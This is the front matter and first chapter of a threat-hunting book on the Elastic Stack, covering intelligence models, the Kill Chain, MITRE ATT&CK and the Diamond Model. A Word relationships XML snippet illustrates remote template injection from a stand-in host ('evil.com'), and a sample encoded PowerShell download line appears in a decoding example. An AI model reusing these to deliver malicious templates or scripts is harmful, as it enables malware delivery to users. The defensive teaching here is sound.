Threat Hunting with Elastic Stack will show you how to make the best use of Elastic Security to provide optimal protection against cyber threats. With this book, security practitioners working with Kibana will be able to put their knowledge to work and detect malicious adversary activity within their contested network.
You'll take a hands-on approach to learning the implementation and methodologies that will have you up and running in no time. Starting with the foundational parts of the Elastic Stack, you'll explore analytical models and how they support security response and finally leverage Elastic technology to perform defensive cyber operations.
You’ll then cover threat intelligence analytical models, threat hunting concepts and methodologies, and how to leverage them in cyber operations. After you’ve mastered the basics, you’ll apply the knowledge you've gained to build and configure your own Elastic Stack, upload data, and explore that data directly as well as by using the built-in tools in the Kibana app to hunt for nefarious activities.
By the end of this book, you'll be able to build an Elastic Stack for self-training or to monitor your own network and/or assets and use Kibana to monitor and hunt for adversaries within your network.
Solve complex security challenges with integrated prevention, detection, and response
Andrew Pease
BIRMINGHAM—MUMBAI
Copyright © 2021 Packt Publishing
All rights reserved. No part of this book may be reproduced, stored in a retrieval system, or transmitted in any form or by any means, without the prior written permission of the publisher, except in the case of brief quotations embedded in critical articles or reviews.
Every effort has been made in the preparation of this book to ensure the accuracy of the information presented. However, the information contained in this book is sold without warranty, either express or implied. Neither the author, nor Packt Publishing or its dealers and distributors, will be held liable for any damages caused or alleged to have been caused directly or indirectly by this book.
Packt Publishing has endeavored to provide trademark information about all of the companies and products mentioned in this book by the appropriate use of capitals. However, Packt Publishing cannot guarantee the accuracy of this information.
Group Product Manager: Wilson Dsouza
Publishing Product Manager: Yogesh Deokar
Senior Editor: Rahul Dsouza
Content Development Editor: Sayali Pingale
Technical Editor: Shruthi Shetty
Copy Editor: Safis Editing
Project Coordinator: Neil Dmello
Proofreader: Safis Editing
Indexer: Tejal Soni
Production Designer: Shankar Kalbhor
First published: July 2021
Production reference: 1210721
Published by Packt Publishing Ltd.
Livery Place
35 Livery Street
Birmingham
B3 2PB, UK.
978-1-80107-378-3
www.packt.com
To my children, who patiently sacrificed their time with me while I spent late nights bent over a keyboard. A special thanks to my wife, Stephanie, for never letting me quit anything.
– Andrew Pease
Andrew Pease began his journey into information security in 2002. He has performed security monitoring, incident response, threat hunting, and intelligence analysis for organizations ranging from the United States Department of Defense to a biotechnology company, and co-founded a security services company called Perched, which was acquired by Elastic in 2019. Andrew is currently employed at Elastic as a Principal Security Research Engineer, where he performs intelligence and analytics research to identify adversary activity on contested networks.
He has been using Elastic for network- and endpoint-based threat hunting since 2013, has developed training on security workloads using the Elastic Stack since 2017, and currently works with a team of brilliant engineers who develop detection logic for the Elastic Security app.
Shimon Modi is a cybersecurity expert with over a decade of experience in developing leading-edge products and bringing them to market. He is currently director of product for Elastic Security and his team focuses on building ML capabilities to address security analyst challenges. Previously he was VP of product and engineering at TruSTAR Technology (acquired by Splunk). He was also a member of Accenture Technology Labs' Cyber R&D group and worked on solutions ranging from security analytics to IIoT security.
Shimon Modi has a Ph.D. from Purdue University focused on biometrics and information security. He has published more than 15 peer-reviewed articles and has presented at top conferences including IEEE, BlackHat, and ShmooCon.
Murat Ogul is a seasoned information security professional with two decades of experience in offensive and defensive security. His domain expertise is mainly in threat hunting, penetration testing, network security, web application security, incident response, and threat intelligence. He holds a master's degree in electrical-electronic engineering, along with several industry-recognized certifications, such as OSCP, CISSP, GWAPT, GCFA, and CEH. He is a big fan of open source projects. He likes contributing to the security community by volunteering at security events and reviewing technical books.
The Elastic Stack has long been known for its ability to search through tremendous amounts of data at incredible speeds. This makes the Elastic Stack a powerful tool for security workloads, and specifically, threat hunting. When threat hunting, you frequently don't know exactly what you're looking for. Having a platform at your fingertips that allows you to creatively explore your data is paramount to detecting adversary activities.
This book is for anyone new to threat hunting, new to leveraging the Elastic Stack for threat hunting, and everyone in between.
Chapter 1, Introduction to Cyber Threat Intelligence, Analytical Models, and Frameworks, lays the groundwork for the critical thinking skills and analytical models used throughout the book.
Chapter 2, Hunting Concepts, Methodologies, and Techniques, discusses how to apply models to collected data and hunt for adversaries.
Chapter 3, Introduction to the Elastic Stack, introduces the different parts of the Elastic Stack.
Chapter 4, Building Your Hunting Lab – Part 1, shows how to build a fully functioning Elastic Stack and victim machine to use for threat hunting research.
Chapter 5, Building Your Hunting Lab – Part 2, configures the Elastic Stack, builds a victim virtual machine, and ingests threat information data into the Elastic Stack.
Chapter 6, Data Collection with Beats and Elastic Agent, focuses on deploying various Elastic data collection tools to systems.
Chapter 7, Using Kibana to Explore and Visualize Data, introduces various query languages, data exploration techniques, and Kibana visualizations.
Chapter 8, The Elastic Security App, dives into the Elastic security technologies in Kibana used for threat hunting and analysis.
Chapter 9, Using Kibana to Pivot Through Data to Find Adversaries, explores using observations to perform targeted threat hunts and create tailored detection logic.
Chapter 10, Leveraging Hunting to Inform Operations, focuses on using threat hunting to assist in incident response operations.
Chapter 11, Enriching Data to Create Intelligence, shows how to enrich events to gain additional insights.
Chapter 12, Sharing Information and Analysis, explores how to describe data in a common format and how to share visualizations and detection logic with partners and peers.
You will need to have a healthy appetite for exploration. While there are specific tools covered in this book, the ability to learn and apply the concepts and theories to new platforms and use cases will make the information transcend beyond the specific examples that we'll cover in the book.
Every tool that we'll use in this book is completely free. While they may have licenses related to how they can be used, it was important that cost wasn't a limiting factor in your ability to learn how to use the Elastic Stack to threat hunt.
You can download the example code files for this book from GitHub at https://github.com/PacktPublishing/Threat-Hunting-with-Elastic-Stack. In case there's an update to the code, it will be updated on the existing GitHub repository.
We also have other code bundles from our rich catalog of books and videos available at
https://github.com/PacktPublishing/. Check them out!
Code in Action videos for this book can be viewed at https://bit.ly/3z4CAOV.
We also provide a PDF file that has color images of the screenshots/diagrams used in this book. You can download it here: http://www.packtpub.com/sites/default/files/downloads/9781801073783_ColorImages.pdf.
There are a number of text conventions used throughout this book.
Code in text: Indicates code words in text, database table names, folder names, filenames, file extensions, pathnames, dummy URLs, user input, and Twitter handles. Here is an example: "Let's use tcpdump to collect on my en0 interface, capturing full-sized packets (-s 0) and saving the capture to local-capture.pcap (-w)."
A block of code is set as follows:
{
"acknowledged" : true,
"shards_acknowledged" : true,
"index" : "my-first-index"
}
Any command-line input or output is written as follows:
$ curl -X PUT "localhost:9200/my-first-index?pretty"
Bold: Indicates a new term, an important word, or words that you see onscreen. For example, words in menus or dialog boxes appear in the text like this. Here is an example: "The Administration interface is seemingly fairly sparse, but it allows you to drill down into detailed configurations for the security policies for the Elastic Agent."
Tips or important notes
Appear like this.
Feedback from our readers is always welcome.
General feedback: If you have questions about any aspect of this book, mention the book title in the subject of your message and email us at [email protected].
Errata: Although we have taken every care to ensure the accuracy of our content, mistakes do happen. If you have found a mistake in this book, we would be grateful if you would report this to us. Please visit www.packtpub.com/support/errata, selecting your book, clicking on the Errata Submission Form link, and entering the details.
Piracy: If you come across any illegal copies of our works in any form on the Internet, we would be grateful if you would provide us with the location address or website name. Please contact us at [email protected] with a link to the material.
If you are interested in becoming an author: If there is a topic that you have expertise in and you are interested in either writing or contributing to a book, please visit authors.packtpub.com.
Once you've read Threat Hunting with Elastic Stack, we'd love to hear your thoughts! Please click here to go straight to the Amazon review page for this book and share your feedback.
Your review is important to us and the tech community and will help us make sure we're delivering excellent quality content.
This section will introduce you to the concepts of cyber threat intelligence and how to use analysis to create intelligence beyond simply uploading indicators of compromise.
This part of the book comprises the following chapters:
Chapter 1, Introduction to Cyber Threat Intelligence, Analytical Models, and Frameworks
Chapter 2, Hunting Concepts, Methodologies, and Techniques
Generally speaking, there are a few "shiny penny" terms in modern IT terminology – blockchain, artificial intelligence, and the dreaded single pane of glass are some classic examples. Cyber Threat Intelligence (CTI) and threat hunting are no different. While all of these terminologies are tremendously valuable, they are commonly used for figurative hand-waving by marketing and sales teams to procure a meeting with a C-suite. With that in mind, let's discuss what CTI and threat hunting are in practicality, versus as umbrella terms for all things security.
Throughout the rest of this book, we'll refer back to the theories and concepts that we cover here. This chapter focuses heavily on critical thinking, reasoning processes, and analytical models; understanding these is paramount because threat hunting is not linear. It involves constant adaptation with a live adversary on the other side of the keyboard. As hard as you are working to detect them, they are working just as hard to evade detection. As we'll discover as we progress through the book, knowledge is important, but being able to adapt to a rapidly changing scenario is crucial to success.
In this chapter, we'll go through the following topics:
What is cyber threat intelligence?
The Intelligence Pipeline
The Lockheed Martin Cyber Kill Chain
The MITRE ATT&CK Matrix
The Diamond Model
My experiences have led me to the opinion that CTI and threat hunting are processes and methodologies tightly coupled with, and in support of, traditional security operations (SecOps).
When we talk about traditional SecOps, we're referring to the deployment and management of various types of infrastructure and defensive tools – think firewalls, intrusion detection systems, vulnerability scanners, and antiviruses. Additionally, this includes some of the less exciting elements, such as policy, and processes such as privacy and incident response (not to say that incident response isn't an absolute blast). There are copious amounts of publications that describe traditional SecOps and I'm certainly not going to try and re-write them. However, to grow and mature as a threat hunter, you need to understand where CTI and threat hunting fit into the big picture.
When we talk about CTI, we mean the processes of collection, analysis, and production that transition data into information and, finally, into intelligence (we'll discuss the technologies and methodologies for doing that later), in support of operations to detect activity that evades automated defenses. Threat hunting searches for adversary activity that cannot be detected by traditional signature-based defensive tools, mainly by profiling and detecting patterns in endpoint and network activity. Combined, CTI and threat hunting are the processes of identifying adversary techniques and their relevance to the network being defended. They then generate profiles and patterns within data to identify when someone may be using those techniques and – this is the often overlooked part – lead to data-driven decisions.
A great example would be identifying that abusing authorized binaries, such as PowerShell or GCC, is a technique used by adversaries. In this example, both PowerShell and GCC are expected to be on the system, so their existence or usage wouldn't cause a host-based detection system to generate an alert. So CTI processes would identify that this is a tactic used by adversaries, threat hunting would profile how these binaries are used in a defended network, and finally, this information would be used to inform active response operations or recommendations to improve the enduring defensive posture.
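In practice, a hunt for LOLBin abuse often begins with simple frequency analysis (sometimes called stack counting): profile how a binary such as PowerShell is normally invoked in the defended network, then surface the rare outliers worth investigating. Here is a minimal sketch in Python; the event fields and sample command lines are entirely illustrative, not a real Elastic schema:

```python
# Hypothetical sketch: stack-count PowerShell command lines to surface
# rare invocations worth a closer look. Field names are illustrative.
from collections import Counter

def rare_command_lines(events, threshold=1):
    """Return command lines seen at or below `threshold` times."""
    counts = Counter(e["command_line"] for e in events
                     if e.get("process") == "powershell.exe")
    return [cmd for cmd, n in counts.items() if n <= threshold]

events = [
    {"process": "powershell.exe", "command_line": "Get-Service"},
    {"process": "powershell.exe", "command_line": "Get-Service"},
    {"process": "powershell.exe", "command_line": "-enc SQBFAFgA..."},
    {"process": "gcc", "command_line": "gcc main.c"},
]
print(rare_command_lines(events))  # the one-off encoded invocation stands out
```

The point is not the code itself but the workflow: "expected on the system" doesn't mean "expected to be used this way," and baselining usage is what turns an authorized binary into a huntable signal.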
Of particular note is that while threat hunting is an evolution from traditional SecOps, that isn't to say that it is inherently better. They are two sides of the same coin. Understanding traditional SecOps and where intelligence analysis and threat hunting should be folded into it is paramount to being successful as a technician, responder, analyst, or leader. In this chapter, we'll discuss the different parts of traditional security operations and how threat hunting and analysis can support SecOps, as well as how SecOps can support threat hunting and incident response operations:
Figure 1.1 – The relationship between IT and cyber security
In the following chapters, we'll discuss several models, both industry-standard ones as well as my own, along with my thoughts on them, their individual strengths and weaknesses, and their applicability. It is important to remember that models and frameworks are just guides to help identify research and defensive prioritizations and incident response processes, and tools to describe campaigns, incidents, and events. Analysts and operators get into trouble when they try to use models as one-size-fits-all solutions, treating them as purely linear and inflexibly rigid.
The models and frameworks that we'll discuss are as follows:
The Intelligence Pipeline
The Lockheed Martin Kill Chain
The MITRE ATT&CK Matrix
The Diamond Model
Finally, we'll discuss how the models and frameworks are most impactful when they are chained together instead of being used independently.
Threat hunting is more than comparing provided indicators of compromise (IOCs) to collected data and finding a "known bad." Threat hunting relies on the application and analysis of data into information and then into intelligence – this is known as the Intelligence Pipeline. To process data through the pipeline, there are several proven analytical models that can be used to understand where an adversary is in their campaign, where they'll need to go next, and how to prioritize threat hunting resources (mainly, time) to disrupt or degrade an intrusion.
The Intelligence Pipeline isn't my invention. I first read about it in an extremely nerdy traditional intelligence-doctrine publication from the United States Joint Chiefs of Staff, JP 2-0 (https://www.jcs.mil/Portals/36/Documents/Doctrine/pubs/jp2_0.pdf). In this document, this process is referred to as the Relationship of Data, Information, and Intelligence process. However, as I've taken it out of that document and made some adjustments to fit my experiences and the cyber domain, I feel that the Intelligence Pipeline is more apt. It is the pipeline and process that you use to inform data-driven decisions:
Figure 1.2 – The Intelligence Pipeline
The idea of the pipeline is to introduce the theory that intelligence is made, and generally not provided. This is anathema to vendors selling "actionable intelligence" as a product. I should note that selling data or information isn't wrong (in fact, it's required in one form or another), but you should know precisely what you're getting – that is, data or information, not intelligence.
As illustrated, the operating environment is everything – your environment, the environment of your trust relationships, the environment of your managed security service provider (MSSP), and so on. From here, events go through the following processes:
Events are collected and processed to turn them into data.
Context and enrichment are added to turn the data into information.
Internal analysis and production are applied to the information to create intelligence.
Data-driven decisions can be created (as necessary).
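These four steps can be sketched as a toy pipeline. Everything below is illustrative – the field names, the IOC list, and the decision logic are hypothetical stand-ins for the real collection, enrichment, and analysis work described above:

```python
# Illustrative sketch of the Intelligence Pipeline stages:
# raw event -> data -> information (context + enrichment) -> intelligence.
KNOWN_C2 = {"203.0.113.7"}  # hypothetical enrichment source, e.g. a shared IOC feed

def to_data(raw_event):
    # Collection/processing: normalize a raw event into structured data
    src, dst_port = raw_event.split()
    return {"src_ip": src, "dst_port": int(dst_port)}

def to_information(data, org_vertical="financial"):
    # Context and enrichment turn data into information
    data["unencrypted"] = data["dst_port"] in (21, 23, 80)
    data["known_c2"] = data["src_ip"] in KNOWN_C2
    data["target_vertical"] = org_vertical
    return data

def to_intelligence(info):
    # Internal analysis and production: is this relevant to *our* environment?
    relevant = info["unencrypted"] and info["known_c2"]
    return {"assessment": "investigate" if relevant else "monitor", **info}

print(to_intelligence(to_information(to_data("203.0.113.7 80"))))
```

Note where the boundary sits: a vendor can realistically hand you everything up to `to_information`; the final step depends on your own observations and so has to happen internally.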
As an example, you might be informed that "this IP address was observed scanning for exposed unencrypted ports across the internet." This is data, but that's all it is. It isn't really even interesting. It's just the "winds of the internet." Ideally, this data would have context applied, such as "this IP address is scanning for exposed unencrypted ports across the internet for ASNs owned by banks"; additionally, the enrichment added could be that this IP address is associated with the command and control entities of a previously observed malicious campaign.
So now we know that a previously identified malicious IP address is scanning financial services organizations for unencrypted ports. This is potentially interesting as it has some context and enrichment, and is perhaps very interesting if you're in the financial services vertical, meaning that this is information and is on its way to becoming intelligence. This is where most vendors lose their ability to provide any additional value. That's not to say that this isn't valuable, but an answer to "did this IP address scan my public environment, and do I have any unencrypted exposed ports?" requires a level of analysis and production that an external party generally cannot provide. This is where you, the analyst or the operator, come in to create intelligence. To do this, you need a few things, most notably your own endpoint and network observations, so that you can help inform a data-driven decision about what your threat, risk, and exposure could be – and, no less importantly, some recommendations on how to reduce them. Later in this book, we'll cover the skills needed to do exactly this.
As an internal organization, you rarely have the resources at your disposal to collect the large swaths of data needed to (eventually) generate intelligence. Additionally, adding context and enrichment at that scale is monumentally expensive in terms of personnel, technology, and capital. So acquiring those services from industry partnerships, generic or vertical-specific Information Sharing and Analysis Centers (ISACs), government entities, and vendors is paramount to having a solid intelligence and threat hunting program. To restate what I mentioned previously, buying or selling "threat intelligence" isn't bad – it's necessary; you just need to know that what you're receiving isn't a magic bullet and almost certainly isn't "actionable intelligence" until it is analyzed into an intelligence product by internal resources so that decision-makers are properly informed when formulating their response.
Lockheed Martin is a United States technology company in the Defense Industrial Base (DIB) that, among other things, created a response model identifying the activities an adversary must accomplish to successfully execute a campaign. This model was one of the first to hit the mainstream that provided analysts, operators, and responders with a way to map an adversary's campaign. This mapping provided a roadmap that, once any adversary activity was detected, outlined how far into the campaign the adversary had gotten, what actions had not been observed yet, and (during incident recovery) what defensive technology, processes, or training needed to be prioritized.
An important note regarding the Lockheed Martin Cyber Kill Chain: it is a high-level model used to illustrate adversary campaign activity. Many tactics and techniques can cover multiple phases, so as we discuss the model, the examples will be large buckets instead of specific tactical techniques. Easy examples of this are supply chain compromises and the abuse of trust relationships: fairly complex techniques that can be used across many different phases of a campaign (or chained between campaigns or phases). Fear not, we'll look at a more specific model, the MITRE ATT&CK framework, later in this chapter.
Figure 1.3 – Lockheed Martin's Cyber Kill Chain
The Kill Chain is broken into seven phases:
Reconnaissance
Weaponization
Delivery
Exploitation
Installation
Command & Control
Actions on the Objective
Let's look at each of them in detail in the following sections.
The Reconnaissance phase is performed when the adversary is mapping out their target. This phase is performed both actively and passively through network and system enumeration, social media profiling, identifying possible vulnerabilities, identifying the protective posture (including the security teams) of the targeted network, and identifying what the target has that may be of value. Does your organization hold something of value, such as intellectual property? Are you a part of the DIB? Are you part of a supply chain that could be used for a further compromise? Do you hold personally identifiable or health information (PII/PHI)?
Weaponization is one of the most expensive parts of the Kill Chain for the adversary. This is when they must go into their arsenal of tools, tactics, and techniques and identify exactly how they are going to leverage the information they collected in the previous phase to achieve their objectives. It's a phase that doesn't leave much room for error. Do they use their bleeding-edge zero-day exploits (that is, exploits that have not been previously disclosed), risking making them unusable in other campaigns? Do they use malware, or do they use a Living-Off-the-Land Binary (LOLBin)? Do too much and they waste the resources (personnel, capital, and time) needed to develop zero-days and complex malware; do too little and they risk getting caught and exposing their attack vehicle.
This phase is also where adversaries acquire infrastructure: to perform the initial entry, stage and launch payloads, perform command and control, and, if needed, provide an exfiltration landing spot. Depending on the complexity of the campaign and the skill of the adversary, infrastructure is either stolen (exploiting and taking over a benign website as a launch/staging point) or purchased. Frequently, infrastructure is stolen because it is easier to blend in with the normal network traffic of a legitimate website. Additionally, when you steal infrastructure, you don't have to put out any money for things that can be traced back to the actor (domain registrations, TLS certificates, hosting, and so on).
This phase is where the adversary makes their attempt to get into the target network. Frequently, this is attempted through phishing (generic, spear-, or whale-phishing, or even through social media). However, this can also be attempted through an insider, a hardware drop (the oddly successful thumb drive in a parking lot), or a remotely exploitable vulnerability.
Generally, this is the riskiest part of a campaign as it is the first time that the adversary is "reaching out and touching" their target with something that could tip off defenders that an attack is incoming.
This phase is performed when the adversary actually exploits the target and executes code on the system. This can be through an exploit against a system vulnerability, against the user, or any combination of the two. An exploit against a system vulnerability either needs to be triggered by tricking the user into opening an attachment or link that executes the exploit condition (Arbitrary Code Execution (ACE)) or needs to be remotely exploitable (Remote Code Execution (RCE)).
The Exploitation phase is generally the first time that you may notice adversary activity as the Delivery phase relies on organizations getting data, such as email, into their environment. While there are scanners and policies to strip out known bad, adversaries are very successful in using email as an initial access point, so the Exploitation phase is frequently where the first detection occurs.
This phase is when an initial payload is delivered as a result of the exploitation of the weaponized object that was delivered to the target. Installation generally has multiple sub-phases, such as loading multiple tools/droppers onto the target to help maintain a foothold on the system, so that the adversary doesn't lose a valuable piece of malware (or other malicious logic) to a lucky anti-virus detection.
As an example, the exploit may be to get a user to open a document that loads a remote template that includes a macro. When the document is opened, the remote template is loaded and brings the macro with it over TLS. Using this example, the email with the attachment looked like normal correspondence and the adversary didn't have to risk losing a valuable macro-enabled document to an email or anti-virus scanner:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="ird4"
Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
Target="file:///C:\Users\admin\AppData\Roaming\Microsoft\Templates\GoodTemplate.dotm?raw=true"
TargetMode="External"/></Relationships>
In the preceding snippet, we can see a normal Microsoft Word document template. Specifically take note of the Target="file:///" section, which defines the local template (GoodTemplate.dotm). In the following snippet, an adversary, using the same Target= syntax, is loading a remote template that includes malicious macros. This process of loading remote templates is allowed within the document standards, which makes it a prime candidate for abuse:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="ird4"
Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
Target="https://evil.com/EvilTemplate.dotm?raw=true" TargetMode="External"/></Relationships>
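From the defender's side, this relationship file is itself a hunting artifact. A hedged sketch of the idea: flag attachedTemplate relationships whose Target points to a remote URL rather than the local filesystem. The function name and sample XML below are illustrative, not part of any particular tool:

```python
# Sketch: parse a Word relationships file and flag attachedTemplate
# entries whose Target is remote (possible remote template injection).
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"

def external_templates(rels_xml):
    root = ET.fromstring(rels_xml)
    hits = []
    for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
        target = rel.get("Target", "")
        if rel.get("Type", "").endswith("/attachedTemplate") and \
           target.startswith(("http://", "https://")):
            hits.append(target)
    return hits

rels = '''<?xml version="1.0"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="ird4"
    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
    Target="https://evil.com/EvilTemplate.dotm?raw=true" TargetMode="External"/>
</Relationships>'''

print(external_templates(rels))  # ['https://evil.com/EvilTemplate.dotm?raw=true']
```

Because the document format permits remote templates, detection has to key on where the template is loaded from, not on whether a template is loaded at all.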
This can go on for several phases, each iteration being more and more difficult to track, using encryption and obfuscation to hide the actual payload that will finally give the adversary sufficient cover and access to proceed without concern for detection.
As a real-world example, during an incident, I observed an adversary use an encoded PowerShell script to download another encoded PowerShell script from the internet, decode it, and that script then downloaded another encoded PowerShell script, and so on, to eventually download five encoded PowerShell scripts, at which point the adversary believed they weren't being tracked (spoiler: they were).
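Unwrapping a chain like that usually begins with the encoding itself: PowerShell's -EncodedCommand takes a Base64 string of UTF-16LE text, so the first decode step is mechanical. An illustrative sketch (the sample stage-1 script and URL are made up):

```python
# Sketch: decode a PowerShell -EncodedCommand payload. PowerShell
# encodes the script as UTF-16LE before Base64-encoding it.
import base64

def decode_powershell(encoded):
    return base64.b64decode(encoded).decode("utf-16-le")

# Build a sample the way an adversary would (values are illustrative)
stage1 = "IEX (New-Object Net.WebClient).DownloadString('https://example.test/stage2')"
encoded = base64.b64encode(stage1.encode("utf-16-le")).decode()

print(decode_powershell(encoded))  # recovers the plaintext stage-1 script
```

Each decoded stage typically reveals the next download, which is why patiently repeating this step (as in the incident above) eventually exposes the whole chain.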
The Command & Control (C2) phase is used to establish remote access over the implant, and ensure that it is able to evade detection and persist through normal system operation (reboots, vulnerability/anti-virus scans, user interaction with the system, and so on).
Other phases tend to move fairly quickly; however, with advanced adversaries, the Installation and C2 phases tend to slow down to avoid detection, often remaining dormant between phases or sub-phases (sometimes using the multiple dropper downloads technique described previously).
This phase is when the adversary pursues the true goal of their intrusion. This can be the end of the campaign or the beginning of a new phase. Traditional objectives can be anything from loading annoying adware to deploying ransomware or exfiltrating sensitive data. However, it is important to remember that the access itself could be the objective, with the implants sold to bad actors on the dark/deep web who could use them for their own purposes.
As noted, this can launch into a new campaign phase and begin by restarting from the Reconnaissance phase from within the network to collect additional information to dig deeper into the target. This is common with compromises of Industrial Control Systems (ICSes) – these systems aren't (supposed to be) connected to the internet, so frequently you have to get onto a system that does access the internet and then use that as a foothold to access the ICS, thus starting a new Kill Chain process.
Our job as analysts, operators, and responders is to push the adversary as far back into the chain as possible to the point that the expense of attacking outweighs the value of success. Make them pay for every bit they get into our network and it should be the last time they get in. We should identify and share every piece of infrastructure we detect. We should analyze and report every piece of malware or LOLBin tactic we uncover. We should make them burn zero-day after zero-day exploit, only for us to detect and stop their advance. Our job is to make the adversary work tremendously hard to make any advance in our network.
The MITRE Corporation is a federally funded, not-for-profit organization that performs research and development for several United States government agencies. One of its many contributions to cybersecurity is a series of detailed, tactical matrices used to describe adversary activities, known as the Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK) matrices. There are three main matrices: Enterprise, Mobile, and ICS.
The Enterprise Matrix includes tactics and techniques focused on preparatory phases (similar to the Reconnaissance and Weaponization phases from the Lockheed Martin Cyber Kill Chain), traditional operating systems, ICSes, and network-centric adversary tactics.
The Mobile Matrix includes tactics and techniques focused on identifying post-exploitation adversary activities targeting Apple's iOS and the Android mobile operating systems.
The ICS Matrix includes tactics and techniques focused on identifying post-exploitation adversary activities targeting an ICS network.
The matrices are all built upon another MITRE framework known as the Cyber Analytics Repository (CAR), which is focused purely on adversary analytics. The ATT&CK matrices are an abstraction that allows you to view the analytics by technique and by tactic.
All of the matrices use a grouping schema of tactic, technique, and, in the case of the Enterprise Matrix, sub-technique. When thinking about the differences between a tactic, a technique, and an analytic, all three elements describe aggressor behavior in a different, but associated, context:
A tactic is the highest level of the actor's behavior (what they want to achieve – initial access, execution, and so on).
A technique is more detailed and carries the context of the tactic (what they are going to use to achieve their tactic – spear phishing, malware, and so on).
An analytic is a highly detailed description of the behavior and carries with it the context of the technique (for instance, the attacker will send an email with malicious content to achieve the initial access).
MITRE uses 14 tactics and Matrix-specific techniques/sub-techniques:
Reconnaissance (PRE matrix only)
– Techniques for information collection on the target
Resource Development (PRE matrix only)
– Techniques for infrastructure acquisition and capabilities development
Initial Access
– Techniques to gain an initial foothold into a target environment
Execution
– Techniques to execute code within the target environment
Persistence
– Techniques that maintain access to the target environment
Privilege Escalation
– Techniques that escalate access within the target environment
Defense Evasion
– Techniques to avoid being detected
Credential Access
– Techniques to acquire internal/additional account credentials
Discovery
– Techniques to learn more about the target environment (networks, services, and so on)
Lateral Movement
– Techniques to expand access beyond the initial entry point
Collection
– Techniques to collect information or data for follow-on activities
Command and Control
– Techniques to control implants within the target environment
Exfiltration
– Techniques to steal collected data from the target environment
Impact
– Techniques to deny, degrade, disrupt, or destroy assets, processes, or operations within the target environment
Within these high-level tactics, there are multiple techniques and sub-techniques used to describe the adversary's actions. Two example techniques and sub-techniques (of the nine techniques available) in the Initial Access tactic are as follows:
Table 1.1 – An example of the MITRE ATT&CK tactic, technique, and sub-technique relationship
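To make the relationship concrete, the grouping schema can be sketched as nested data. This is not an official MITRE data format, just an illustration using the real ATT&CK IDs for the Phishing technique under the Initial Access tactic (the sub-technique list is abbreviated):

```python
# Illustrative (non-official) nesting of the ATT&CK grouping schema:
# tactic -> technique -> sub-technique, using real ATT&CK IDs.
attack_subset = {
    "TA0001": {  # Tactic: Initial Access
        "name": "Initial Access",
        "techniques": {
            "T1566": {  # Technique: Phishing
                "name": "Phishing",
                "sub_techniques": {
                    "T1566.001": "Spearphishing Attachment",
                    "T1566.002": "Spearphishing Link",
                },
            },
        },
    },
}

def list_sub_techniques(tactic_id, technique_id):
    """Return the sub-technique IDs recorded under a given technique."""
    technique = attack_subset[tactic_id]["techniques"][technique_id]
    return sorted(technique["sub_techniques"])

print(list_sub_techniques("TA0001", "T1566"))
# prints ['T1566.001', 'T1566.002']
```

The nesting mirrors how the matrices are browsed on the ATT&CK website: pick a tactic column, then drill into a technique and its sub-techniques.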
Elastic, wanting to describe detections within the proper context, has added MITRE ATT&CK elements to each of its detection rules. We'll discuss this in detail later on:
Figure 1.4 – An example of the MITRE ATT&CK framework in the Elastic Security app
As we can see, MITRE's ATT&CK matrices are much more detailed than the Lockheed Martin Cyber Kill Chain, but that isn't to say that one is necessarily better than the other; both have their uses. For example, in technical writing or briefings, being able to describe that the adversary's Resource Development tactic included the technique of developing capabilities, and specifically exploits, is valuable; however, if the audience isn't very technical, simply stating that the adversary weaponized their attack (using the Lockheed Martin Kill Chain) may be easier to understand.
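To see what the Elastic rule mapping looks like in practice, here is a simplified sketch, expressed as a Python dictionary, of the threat field that Elastic detection rules use to carry their ATT&CK context. The rule name is hypothetical and the exact schema can vary between stack versions, so treat this as an approximation rather than the authoritative format:

```python
# A simplified sketch (not the authoritative schema) of how an Elastic
# detection rule carries its MITRE ATT&CK context in a "threat" field.
rule = {
    "name": "Example phishing detection rule",  # hypothetical rule name
    "threat": [
        {
            "framework": "MITRE ATT&CK",
            "tactic": {
                "id": "TA0001",
                "name": "Initial Access",
                "reference": "https://attack.mitre.org/tactics/TA0001/",
            },
            "technique": [
                {
                    "id": "T1566",
                    "name": "Phishing",
                    "reference": "https://attack.mitre.org/techniques/T1566/",
                    "subtechnique": [
                        {
                            "id": "T1566.001",
                            "name": "Spearphishing Attachment",
                            "reference": "https://attack.mitre.org/techniques/T1566/001/",
                        }
                    ],
                }
            ],
        }
    ],
}

# Pull out the tactic/technique pairs for display alongside an alert.
for entry in rule["threat"]:
    for tech in entry["technique"]:
        print(entry["tactic"]["name"], "->", tech["id"], tech["name"])
# prints Initial Access -> T1566 Phishing
```

Because every rule carries this structure, alerts in the Security app can be grouped and triaged by the tactic and technique they detect.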
The Diamond Model (The Diamond Model of Intrusion Analysis, Sergio Caltagirone, Andrew Pendergast, and Christopher Betz, https://apps.dtic.mil/dtic/tr/fulltext/u2/a586960.pdf) was created by a non-profit organization called the Center for Cyber Intelligence Analysis and Threat Research (CCIATR). The paper, titled The Diamond Model of Intrusion Analysis, was released in 2013 with the novel goal of providing a standardized approach to characterizing campaigns, differentiating one campaign from another, tracking their life cycles, and, finally, developing countermeasures to mitigate them.
The Diamond Model uses a simple visual to illustrate six elements valuable for campaign tracking: Adversary, Infrastructure, Victim, Capabilities, Socio-political, and Tactics, Techniques, and Procedures (TTP).
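As a quick illustration, the six elements can be captured as a simple record per intrusion event. The field names and sample values below are hypothetical, chosen for this sketch rather than prescribed by the model:

```python
from dataclasses import dataclass

# Hypothetical record type for the six Diamond Model elements listed above;
# field names and sample values are illustrative only.
@dataclass
class DiamondEvent:
    adversary: str           # who is behind the activity
    infrastructure: list     # assets the adversary leveraged
    victim: str              # who was targeted
    capabilities: list       # tools/malware observed
    socio_political: str     # why this victim was targeted
    ttps: list               # observed ATT&CK technique IDs

event = DiamondEvent(
    adversary="unknown-actor-1",
    infrastructure=["203.0.113.10"],  # RFC 5737 documentation address
    victim="example.com mail server",
    capabilities=["spearphishing attachment"],
    socio_political="financial gain",
    ttps=["T1566.001"],
)
print(event.victim)
# prints example.com mail server
```

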